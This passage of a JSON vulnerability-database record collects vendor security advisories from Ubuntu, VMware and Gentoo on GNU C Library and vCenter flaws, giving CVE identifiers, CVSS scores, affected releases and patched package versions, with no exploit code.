vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 11.10\r\n- Ubuntu 11.04\r\n- Ubuntu 10.10\r\n- Ubuntu 10.04 LTS\r\n- Ubuntu 8.04 LTS\r\n\r\nSummary:\r\n\r\nMultiple vulnerabilities were discovered and fixed in the GNU C Library.\r\n\r\nSoftware Description:\r\n- eglibc: Embedded GNU C Library: sources\r\n- glibc: GNU C Library: Documentation\r\n\r\nDetails:\r\n\r\nIt was discovered that the GNU C Library did not properly handle\r\ninteger overflows in the timezone handling code. An attacker could use\r\nthis to possibly execute arbitrary code by convincing an application\r\nto load a maliciously constructed tzfile. &#40;CVE-2009-5029&#41;\r\n\r\nIt was discovered that the GNU C Library did not properly handle\r\npasswd.adjunct.byname map entries in the Network Information Service\r\n&#40;NIS&#41; code in the name service caching daemon &#40;nscd&#41;. An attacker\r\ncould use this to obtain the encrypted passwords of NIS accounts.\r\nThis issue only affected Ubuntu 8.04 LTS. &#40;CVE-2010-0015&#41;\r\n\r\nChris Evans reported that the GNU C Library did not properly\r\ncalculate the amount of memory to allocate in the fnmatch&#40;&#41; code. An\r\nattacker could use this to cause a denial of service or possibly\r\nexecute arbitrary code via a maliciously crafted UTF-8 string.\r\nThis issue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS and Ubuntu\r\n10.10. &#40;CVE-2011-1071&#41;\r\n\r\nTomas Hoger reported that an additional integer overflow was possible\r\nin the GNU C Library fnmatch&#40;&#41; code. An attacker could use this to\r\ncause a denial of service via a maliciously crafted UTF-8 string. This\r\nissue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, Ubuntu 10.10\r\nand Ubuntu 11.04. &#40;CVE-2011-1659&#41;\r\n\r\nDan Rosenberg discovered that the addmntent&#40;&#41; function in the GNU C\r\nLibrary did not report an error status for failed attempts to write to\r\nthe /etc/mtab file. This could allow an attacker to corrupt /etc/mtab,\r\npossibly causing a denial of service or otherwise manipulate mount\r\noptions. This issue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS,\r\nUbuntu 10.10 and Ubuntu 11.04. &#40;CVE-2011-1089&#41;\r\n\r\nHarald van Dijk discovered that the locale program included with the\r\nGNU C library did not properly quote its output. This could allow a\r\nlocal attacker to possibly execute arbitrary code using a crafted\r\nlocalization string that was evaluated in a shell script. This\r\nissue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS and Ubuntu\r\n10.10. &#40;CVE-2011-1095&#41;\r\n\r\nIt was discovered that the GNU C library loader expanded the\r\n$ORIGIN dynamic string token when RPATH is composed entirely of this\r\ntoken. This could allow an attacker to gain privilege via a setuid\r\nprogram that had this RPATH value. &#40;CVE-2011-1658&#41;\r\n\r\nIt was discovered that the GNU C library implementation of memcpy\r\noptimized for Supplemental Streaming SIMD Extensions 3 &#40;SSSE3&#41;\r\ncontained a possible integer overflow. An attacker could use this to\r\ncause a denial of service or possibly execute arbitrary code. This\r\nissue only affected Ubuntu 10.04 LTS. &#40;CVE-2011-2702&#41;\r\n\r\nJohn Zimmerman discovered that the Remote Procedure Call &#40;RPC&#41;\r\nimplementation in the GNU C Library did not properly handle large\r\nnumbers of connections. This could allow a remote attacker to cause\r\na denial of service. &#40;CVE-2011-4609&#41;\r\n\r\nIt was discovered that the GNU C Library vfprintf&#40;&#41; implementation\r\ncontained a possible integer overflow in the format string protection\r\ncode offered by FORTIFY_SOURCE. An attacker could use this flaw in\r\nconjunction with a format string vulnerability to bypass the format\r\nstring protection and possibly execute arbitrary code. &#40;CVE-2012-0864&#41;\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 11.10:\r\n libc6 2.13-20ubuntu5.1\r\n\r\nUbuntu 11.04:\r\n libc6 2.13-0ubuntu13.1\r\n\r\nUbuntu 10.10:\r\n libc-bin 2.12.1-0ubuntu10.4\r\n libc6 2.12.1-0ubuntu10.4\r\n\r\nUbuntu 10.04 LTS:\r\n libc-bin 2.11.1-0ubuntu7.10\r\n libc6 2.11.1-0ubuntu7.10\r\n\r\nUbuntu 8.04 LTS:\r\n libc6 2.7-10ubuntu8.1\r\n\r\nAfter a standard system update you need to restart all services or\r\nreboot your computer to make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-1396-1\r\n CVE-2009-5029, CVE-2010-0015, CVE-2011-1071, CVE-2011-1089,\r\n CVE-2011-1095, CVE-2011-1658, CVE-2011-1659, CVE-2011-2702,\r\n CVE-2011-4609, CVE-2012-0864\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/eglibc/2.13-20ubuntu5.1\r\n https://launchpad.net/ubuntu/+source/eglibc/2.13-0ubuntu13.1\r\n https://launchpad.net/ubuntu/+source/eglibc/2.12.1-0ubuntu10.4\r\n https://launchpad.net/ubuntu/+source/eglibc/2.11.1-0ubuntu7.10\r\n https://launchpad.net/ubuntu/+source/glibc/2.7-10ubuntu8.1\r\n", "edition": 1, "modified": "2012-03-10T00:00:00", "published": "2012-03-10T00:00:00", "id": "SECURITYVULNS:DOC:27743", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27743", "title": "[USN-1396-1] GNU C Library vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:46", "bulletinFamily": "software", "cvelist": ["CVE-2012-0864", "CVE-2011-4609", "CVE-2012-6325", "CVE-2012-3404", "CVE-2012-6324", "CVE-2012-3405", "CVE-2010-0830", "CVE-2012-3480", "CVE-2009-5029", "CVE-2012-3406", "CVE-2011-1089", "CVE-2009-5064"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n VMware Security Advisory\r\n\r\nAdvisory ID: VMSA-2012-0018\r\nSynopsis: VMware security updates for vCSA and ESXi\r\nIssue date: 2012-12-20\r\nUpdated on: 2012-12-20 &#40;initial advisory&#41;\r\nCVE numbers: ------------- vCSA ---------------\r\n CVE-2012-6324, CVE-2012-6325\r\n ------------- glibc --------------\r\n CVE-2009-5029, CVE-2009-5064, CVE-2010-0830,\r\n CVE-2011-1089, CVE-2011-4609, CVE-2012-0864,\r\n CVE-2012-3404, CVE-2012-3405, CVE-2012-3406,\r\n CVE-2012-3480\r\n\r\n- --------------------------------------------------------------------\r\n\r\n1. Summary\r\n\r\n VMware has updated vCenter Server Appliance &#40;vCSA&#41; and ESX to \r\n address multiple security vulnerabilities\r\n\r\n2. Relevant releases\r\n\r\n vCenter Server Appliance 5.1 without Patch 1\r\n vCenter Server Appliance 5.0 without Update 2\r\n\r\n VMware ESXi 5.1 without patch ESXi510-201212101\r\n VMware ESXi 5.0 without patch ESXi500-201212101\r\n\r\n3. Problem Description\r\n\r\n a. vCenter Server Appliance directory traversal\r\n\r\n The vCenter Server Appliance &#40;vCSA&#41; contains a directory\r\n traversal vulnerability that allows an authenticated \r\n remote user to retrieve arbitrary files. Exploitation of\r\n this issue may expose sensitive information stored on the \r\n server. \r\n\r\n VMware would like to thank Alexander Minozhenko from ERPScan for\r\n reporting this issue to us.\r\n\r\n The Common Vulnerabilities and Exposures project &#40;cve.mitre.org&#41;\r\n has assigned the name CVE-2012-6324 to this issue.\r\n\r\n Column 4 of the following table lists the action required to\r\n remediate the vulnerability in each release, if a solution is\r\n available.\r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch\r\n ============== ======== ======= =================\r\n vCSA 5.1 Linux vCSA 5.1 Patch 1\r\n vCSA 5.0 Linux vCSA 5.0 Update 2\r\n\r\n b. vCenter Server Appliance arbitrary file download\r\n\r\n The vCenter Server Appliance &#40;vCSA&#41; contains an XML parsing \r\n vulnerability that allows an authenticated remote user to\r\n retrieve arbitrary files. Exploitation of this issue may\r\n expose sensitive information stored on the server.\r\n\r\n VMware would like to thank Alexander Minozhenko from ERPScan for\r\n reporting this issue to us.\r\n\r\n The Common Vulnerabilities and Exposures project &#40;cve.mitre.org&#41;\r\n has assigned the name CVE-2012-6325 to this issue.\r\n\r\n Column 4 of the following table lists the action required to\r\n remediate the vulnerability in each release, if a solution is\r\n available.\r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch\r\n ============== ======== ======= =================\r\n vCSA 5.1 Linux not affected\r\n vCSA 5.0 Linux vCSA 5.0 Update 2\r\n\r\nc. Update to ESX glibc package\r\n\r\n The ESX glibc package is updated to version glibc-2.5-81.el5_8.1\r\n to resolve multiple security issues.\r\n\r\n The Common Vulnerabilities and Exposures project &#40;cve.mitre.org&#41;\r\n has assigned the names CVE-2009-5029, CVE-2009-5064,\r\n CVE-2010-0830, CVE-2011-1089, CVE-2011-4609, CVE-2012-0864\r\n CVE-2012-3404, CVE-2012-3405, CVE-2012-3406 and CVE-2012-3480\r\n to these issues.\r\n\r\n Column 4 of the following table lists the action required to\r\n remediate the vulnerability in each release, if a solution is\r\n available.\r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch\r\n ============== ======== ======= =================\r\n ESXi 5.1 ESXi ESXi510-201212101\r\n ESXi 5.0 ESXi ESXi500-201212101\r\n ESXi 4.1 ESXi no patch planned\r\n ESXi 4.0 ESXi no patch planned\r\n ESXi 3.5 ESXi not applicable\r\n\r\n ESX any ESX not applicable\r\n\r\n4. Solution\r\n\r\n Please review the patch/release notes for your product and\r\n version and verify the checksum of your downloaded file.\r\n\r\n\r\n ESXi and ESX\r\n ------------\r\n The download for ESXi includes vCenter Server Appliance.\r\n\r\n\r\n https://downloads.vmware.com/go/selfsupport-download\r\n\r\n ESXi 5.1\r\n http://kb.vmware.com/kb/2035775\r\n\r\n ESXi 5.0\r\n http://kb.vmware.com/kb/2033751\r\n\r\n5. References\r\n\r\n ------------- vCSA ---------------\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6324\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6325\r\n ------------- glibc --------------\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-5029\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-5064\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0830\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1089\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4609\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0864\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3404\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3405\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3406\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3480\r\n\r\n- --------------------------------------------------------------------\r\n\r\n6. Change log\r\n\r\n 2012-12-20 VMSA-2012-0018\r\n Initial security advisory in conjunction with the release of\r\n vSphere 5.1 Patch 1 and vSphere 5.0 Update 2 on 2012-12-20.\r\n\r\n- --------------------------------------------------------------------\r\n\r\n7. Contact\r\n\r\n E-mail list for product security notifications and announcements:\r\n http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\r\n\r\n This Security Advisory is posted to the following lists:\r\n\r\n * security-announce at lists.vmware.com\r\n * bugtraq at securityfocus.com\r\n * full-disclosure at lists.grok.org.uk\r\n\r\n E-mail: security at vmware.com\r\n PGP key at: http://kb.vmware.com/kb/1055\r\n\r\n VMware Security Advisories\r\n http://www.vmware.com/security/advisories\r\n\r\n VMware security response policy\r\n http://www.vmware.com/support/policies/security_response.html\r\n\r\n General support life cycle policy\r\n http://www.vmware.com/support/policies/eos.html\r\n\r\n VMware Infrastructure support life cycle policy\r\n http://www.vmware.com/support/policies/eos_vi.html\r\n\r\n Copyright 2012 VMware Inc. All rights reserved.\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP Desktop 10.2.0 &#40;Build 2599&#41;\r\nCharset: utf-8\r\n\r\nwj8DBQFQ01bsDEcm8Vbi9kMRAkXEAJoClYysvoV67RKiZ0uN1YszPcN0LQCg8QMV\r\nOWjpV7Bnt27472i5EOhk9fI=\r\n=jrDP\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2013-01-02T00:00:00", "published": "2013-01-02T00:00:00", "id": "SECURITYVULNS:DOC:28907", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28907", "title": "VMSA-2012-0018 VMware security updates for vCSA and ESXi", "type": "securityvulns", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:23", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0864", "CVE-2011-1658", "CVE-2011-1659", "CVE-2011-1071", "CVE-2011-1095", "CVE-2010-3847", "CVE-2009-5029", "CVE-2011-0536", "CVE-2011-1089"], "edition": 1, "description": "### Background\n\nThe GNU C library is the standard C library used by Gentoo Linux systems. \n\n### Description\n\nMultiple vulnerabilities have been discovered in GNU C Library. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA local attacker could trigger vulnerabilities in dynamic library loader, making it possible to load attacker-controlled shared objects during execution of setuid/setgid programs to escalate privileges. \n\nA context-dependent attacker could trigger various vulnerabilities in GNU C Library, including a buffer overflow, leading to execution of arbitrary code or a Denial of Service. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll GNU C Library users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=sys-libs/glibc-2.15-r3\"", "modified": "2013-12-03T00:00:00", "published": "2013-12-03T00:00:00", "id": "GLSA-201312-01", "href": "https://security.gentoo.org/glsa/201312-01", "type": "gentoo", "title": "GNU C Library: Multiple vulnerabilities", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2020-07-08T23:30:23", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0864", "CVE-2010-0015", "CVE-2011-4609", "CVE-2011-1658", "CVE-2011-1659", "CVE-2011-1071", "CVE-2011-1095", "CVE-2009-5029", "CVE-2011-2702", "CVE-2011-1089"], "description": "It was discovered that the GNU C Library did not properly handle \ninteger overflows in the timezone handling code. An attacker could use \nthis to possibly execute arbitrary code by convincing an application \nto load a maliciously constructed tzfile. (CVE-2009-5029)\n\nIt was discovered that the GNU C Library did not properly handle \npasswd.adjunct.byname map entries in the Network Information Service \n(NIS) code in the name service caching daemon (nscd). An attacker \ncould use this to obtain the encrypted passwords of NIS accounts. \nThis issue only affected Ubuntu 8.04 LTS. (CVE-2010-0015)\n\nChris Evans reported that the GNU C Library did not properly \ncalculate the amount of memory to allocate in the fnmatch() code. An \nattacker could use this to cause a denial of service or possibly \nexecute arbitrary code via a maliciously crafted UTF-8 string. \nThis issue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS and Ubuntu \n10.10. (CVE-2011-1071)\n\nTomas Hoger reported that an additional integer overflow was possible \nin the GNU C Library fnmatch() code. An attacker could use this to \ncause a denial of service via a maliciously crafted UTF-8 string. This \nissue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, Ubuntu 10.10 \nand Ubuntu 11.04. (CVE-2011-1659)\n\nDan Rosenberg discovered that the addmntent() function in the GNU C \nLibrary did not report an error status for failed attempts to write to \nthe /etc/mtab file. This could allow an attacker to corrupt /etc/mtab, \npossibly causing a denial of service or otherwise manipulate mount \noptions. This issue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, \nUbuntu 10.10 and Ubuntu 11.04. (CVE-2011-1089)\n\nHarald van Dijk discovered that the locale program included with the \nGNU C library did not properly quote its output. This could allow a \nlocal attacker to possibly execute arbitrary code using a crafted \nlocalization string that was evaluated in a shell script. This \nissue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS and Ubuntu \n10.10. (CVE-2011-1095)\n\nIt was discovered that the GNU C library loader expanded the \n$ORIGIN dynamic string token when RPATH is composed entirely of this \ntoken. This could allow an attacker to gain privilege via a setuid \nprogram that had this RPATH value. (CVE-2011-1658)\n\nIt was discovered that the GNU C library implementation of memcpy \noptimized for Supplemental Streaming SIMD Extensions 3 (SSSE3) \ncontained a possible integer overflow. An attacker could use this to \ncause a denial of service or possibly execute arbitrary code. This \nissue only affected Ubuntu 10.04 LTS. (CVE-2011-2702)\n\nJohn Zimmerman discovered that the Remote Procedure Call (RPC) \nimplementation in the GNU C Library did not properly handle large \nnumbers of connections. This could allow a remote attacker to cause \na denial of service. (CVE-2011-4609)\n\nIt was discovered that the GNU C Library vfprintf() implementation \ncontained a possible integer overflow in the format string protection \ncode offered by FORTIFY_SOURCE. An attacker could use this flaw in \nconjunction with a format string vulnerability to bypass the format \nstring protection and possibly execute arbitrary code. (CVE-2012-0864)", "edition": 5, "modified": "2012-03-09T00:00:00", "published": "2012-03-09T00:00:00", "id": "USN-1396-1", "href": "https://ubuntu.com/security/notices/USN-1396-1", "title": "GNU C Library vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "vmware": [{"lastseen": "2019-11-06T16:05:37", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0864", "CVE-2011-4609", "CVE-2012-6325", "CVE-2012-3404", "CVE-2012-6326", "CVE-2012-6324", "CVE-2012-3405", "CVE-2010-0830", "CVE-2012-3480", "CVE-2009-5029", "CVE-2012-3406", "CVE-2011-1089", "CVE-2009-5064"], "description": "a. vCenter Server Appliance directory traversal \n \n\n\nThe vCenter Server Appliance (vCSA) contains a directory traversal vulnerability that allows an authenticated remote user to retrieve arbitrary files. Exploitation of this issue may expose sensitive information stored on the server. \n \nVMware would like to thank Alexander Minozhenko from ERPScan for reporting this issue to us. \n \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2012-6324 to this issue. \n \nColumn 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available.\n", "edition": 4, "modified": "2013-04-25T00:00:00", "published": "2012-12-20T00:00:00", "id": "VMSA-2012-0018", "href": "https://www.vmware.com/security/advisories/VMSA-2012-0018.html", "title": "VMware security updates for vCSA, vCenter Server, and ESXi", "type": "vmware", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-11-06T16:05:38", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0864", "CVE-2011-3188", "CVE-2011-4108", "CVE-2011-4609", "CVE-2011-4128", "CVE-2012-0815", "CVE-2011-3597", "CVE-2011-4324", "CVE-2011-4110", "CVE-2011-4576", "CVE-2011-4577", "CVE-2010-4180", "CVE-2010-4410", "CVE-2011-2699", "CVE-2011-4619", "CVE-2010-2761", "CVE-2011-4132", "CVE-2011-0014", "CVE-2010-0830", "CVE-2011-2484", "CVE-2012-1583", "CVE-2012-0061", "CVE-2012-0393", "CVE-2011-3209", "CVE-2012-0050", "CVE-2011-3363", "CVE-2012-0060", "CVE-2011-1833", "CVE-2012-0207", "CVE-2011-1020", "CVE-2012-2110", "CVE-2012-1569", "CVE-2010-4252", "CVE-2012-0841", "CVE-2009-5029", "CVE-2011-4325", "CVE-2012-1573", "CVE-2011-4109", "CVE-2011-1089", "CVE-2009-5064", "CVE-2011-2496"], "description": "a. vCenter and ESX update to JRE 1.6.0 Update 31 \nThe Oracle (Sun) JRE is updated to version 1.6.0_31, which addresses multiple security issues. Oracle has documented the CVE identifiers that are addressed by this update in the Oracle Java SE Critical Patch Update Advisory of February 2012. \nColumn 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. \n\n", "edition": 4, "modified": "2012-12-20T00:00:00", "published": "2012-08-30T00:00:00", "id": "VMSA-2012-0013", "href": "https://www.vmware.com/security/advisories/VMSA-2012-0013.html", "title": "VMware vSphere and vCOps updates to third party libraries", "type": "vmware", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}